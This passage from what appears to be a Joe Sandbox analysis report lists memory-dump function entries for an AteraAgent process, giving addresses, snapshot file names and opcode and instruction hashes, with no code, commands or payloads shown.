                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a7da3ff4c77d166db7e61fb326c3cc4cdf3c475466f8b245dccef7e4d7a2de97
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5892465af0f55e9e5c543464425a11853b449c0b8945ae9ed4152f36db36446c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7da3ff4c77d166db7e61fb326c3cc4cdf3c475466f8b245dccef7e4d7a2de97
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C115171609B489FE7B89F28845DBA777E5EBA9311F01453ED4CDC7261EF3068418742
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62A0F3 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c68f6cd334d7c94e497eab1830c6fed541cafa10fc65a1b0d756f423b785c003
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 30794c8d838e691e5b05939e25fd8110d53761e81581e0b1a1ff527b85b65f89
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c68f6cd334d7c94e497eab1830c6fed541cafa10fc65a1b0d756f423b785c003
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A012632B0AA4E4FFB649FAC887A1F43B90EF86721F0501B6D0A9CB1B2D9503A41C701
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63D1DD Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 15bb5f9bb6a899b9740c965d61ae8420d246fc0b293db39c14bbdd1333dbd406
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 94814403c78daa43cb92fd713c07c0b0205edbf9497cc42fafa1e965e3a0141e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15bb5f9bb6a899b9740c965d61ae8420d246fc0b293db39c14bbdd1333dbd406
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7501B512A4F6CA1FE37263AC58303A06FA19F53154B0E01F6D098CF1E3C94DB94AC391
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62D33D Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 37a1a7b29f271fe930caca023271e2b9d65618730ce7fbd28e9a1a2305d01558
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0ec74ea79564286bdcc6924511bbe7aa90e2b6678fbb4ef38d2b42a353c25ff3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37a1a7b29f271fe930caca023271e2b9d65618730ce7fbd28e9a1a2305d01558
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6113612A2DF8A07E328A37894257E567E1FF90304F04047AD0EECA2D3DE6876498341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B638413 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 315f482ed581f87753e08692600472fb5dc2cc64fd2418d4390526b48ad2bb32
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5dbda3369df2d4780cc157f9c763b0dcc6615bd044ce44aa0601486d8f1dd781
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 315f482ed581f87753e08692600472fb5dc2cc64fd2418d4390526b48ad2bb32
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7101A43270DD4C4FE7D8EA1CA895AB433E2EBA932031505E7E45DCB762E911EC528741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6252FD Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a0250e55a050e44c3a651f006d9fd8b44f45418f12239b7f13c90f6a16d2c189
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 902f2d70ffc3ef82f3f42c808f2e3c21a54da69ce8d8fabaabb43082b8a5dab2
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0250e55a050e44c3a651f006d9fd8b44f45418f12239b7f13c90f6a16d2c189
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA01F93194F2CE5FE7265B7098621F57FA0EF07314F0651A6E058CE0A3D959275AC351
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B837744 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 120934b41876a4c18ebea9c34a0f691de77885b902dddc4681843a4d7c9c153f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 903e1cc6ddadca9ef578d9e4b355d4204a350d49ae987bdd874f70d9481821bb
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 120934b41876a4c18ebea9c34a0f691de77885b902dddc4681843a4d7c9c153f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF0F6A3F5EA4E4AE6AC529C74121F563C1DB89660302417BE41AC279AEC0AAD434180
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6379B1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8616b7a5c1ea19efd47e0eb49857fd33df5afda430e777243ad68d178e883f36
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 829b9d9899434ac1ae116e2f2a0c63cacad2d212ede8a7cd31204e8590eba269
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8616b7a5c1ea19efd47e0eb49857fd33df5afda430e777243ad68d178e883f36
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1F0BB2271D58C0FE794955CAC5D9723BD4DB6613231602FFE448C71B3E90698028355
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B633230 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 596e0836c3b15d49bb44acfd7dabccf11d7a198a728f51d50e2c9cca6692e6fe
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1fa54b39f4d35b621a708737727754feb8ae5cae98036227bde43c5e5911556b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 596e0836c3b15d49bb44acfd7dabccf11d7a198a728f51d50e2c9cca6692e6fe
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F019630A09B494FD7A5EB288454A767BD1EFD5314F04097EE48AC72A1DA34A541C741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B628A22 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 560904fe4729301fea7cf8d807c215f6fead7ad01e77a6cdbebb984286c656c5
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8aac910e4517610c85f045b100f4579d600dcfa8a9295491550d9f97a2ed6cdc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 560904fe4729301fea7cf8d807c215f6fead7ad01e77a6cdbebb984286c656c5
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BF0CD35E4964E8BE720AF94A4002F9F7B4EF82310F01213AC01CEB150DB3AAA95CB48
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B624228 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 936102325533882fec8c753b90c3036a3a3aecd3aad08961d19027e36d1cd2de
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ac1fc732d25b510d7d842d1eaac53609c1f8bdfa5ce88609aaf04bc6b565d000
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 936102325533882fec8c753b90c3036a3a3aecd3aad08961d19027e36d1cd2de
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDF0CD36E4A50C8BEB20AF95A4002F8F7B4FB82354F11203AC11CEB150D73AAA95CB48
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B833ACD Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 56e8414b50a3bac310c94ebc1ad9af4a4eb44c9619b5c95e4a4130b677d56d86
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dc466074ab72b82f89009b674e9d6a37f0d483f5e8566ff31f7a2978a27ae95d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56e8414b50a3bac310c94ebc1ad9af4a4eb44c9619b5c95e4a4130b677d56d86
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29F08131F1C91E4FDBA8EB589861BA87392FB88310F1140B6C00DC33A6DE25AC418781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B624B89 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 55f07d1e26465ccac36167cdb79ad980da212d3f62b005e3b78a05dee586e8aa
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b5f1f83b14a46c26eee02784f8f01f3fcf149225926559b96583f50914c9c884
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55f07d1e26465ccac36167cdb79ad980da212d3f62b005e3b78a05dee586e8aa
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2001F765A0EBCD5FE7569B6888A52E87FB0EF0A301F0601E7D458CA0B7D9242949C701
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B641241 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c2c764921cd09042ca9bf9234b26401efa35b57dd1d2921c0a82b1a232a8fc3f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f375361fa53ad9d7fb5a1c104ab99afaad50640e3aa4f77cdf4c7eed34db6144
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2c764921cd09042ca9bf9234b26401efa35b57dd1d2921c0a82b1a232a8fc3f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41F0243270ED0D4FEB58954CB8A267837C2EB96330701017AE1AACB1B2DC22B8038245
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B634121 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 70a9151b85574f5e7168805eb55ea66e9796bab83259a197a6c7cc75375cba0b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 90815cee9f3db4837130073a36565b6b0d9b40e6ac01696af9c9fbb8b7605fcc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a9151b85574f5e7168805eb55ea66e9796bab83259a197a6c7cc75375cba0b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F0FC7394DBCD1FEB71866884613E57BA1EF52210F0501FAE05CDA193ED282A45C781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B630B02 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4d0a3f6e1ab5a6a5b88147ed3a0e6a4b67b58560cb3a9c1a8f3138196e9878aa
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 14731e84295e3b758d9f11a1c1d4707ada7e2aa3d770581e20ca243a93c4b15b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d0a3f6e1ab5a6a5b88147ed3a0e6a4b67b58560cb3a9c1a8f3138196e9878aa
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F0F42160EACE0FE32A977884646A47BE1AF45310B0E01F6C489CF2A3DA1DB9898741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B624B1D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9508e216ff2ad5c25dc178143839cf2c6d68fc91d4fc59e08e1df5c7049ebea9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3808a411adcc3a90d1f1df03e107f754125ffb69fb3dbf02cb7eea83b647871f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9508e216ff2ad5c25dc178143839cf2c6d68fc91d4fc59e08e1df5c7049ebea9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A01D63190A68D8FEB55EF14C8652E97BA1FF56300F02047DE41CC7596CB75E950CB40
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B636182 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ba34932ceb3573064d11704c74b324da6d9778af16f6ee0d86176f0201433d44
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 80150dbefe8814335071c86ea2fc4b968f8c330cc60f3407c1564347c5a77d18
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba34932ceb3573064d11704c74b324da6d9778af16f6ee0d86176f0201433d44
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0CD4090E3C90FE75A9778486A261BFE1AF97200B4D82EBC0C8CF0A3C92CA5498312
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63FC51 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3bda1ca0c98891ba2a850359c566b53c1a94ba5f1f5ea33e508b94c0d11c94e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7076a2918ad42ed8efdfcbdbcabc81abe574eb10049f3e202e40fa8c2b8700c4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3bda1ca0c98891ba2a850359c566b53c1a94ba5f1f5ea33e508b94c0d11c94e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE0DF33B0990C4F9B98899C389A1FA73E2E398125B10033FE14EC2211C92298068380
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62BC4A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d63b20a9ead0055ad73607a804eb3c5e7ecc9c8832b4dd8bd8d0770c37ab253
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a5e256eea49238c52dd6349fafc04909a3d8d7cb4cc109c3272575ea714e1b65
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d63b20a9ead0055ad73607a804eb3c5e7ecc9c8832b4dd8bd8d0770c37ab253
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F05475B1964D9BEB88E7988895DAC73B2FFD8B50F454034E098D72A2DE2978018711
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62A0A5 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b1151aac2ad56fc14de03e2ecfcc65b2a3572ef4e2ba8688ba70bb8cad43ccbd
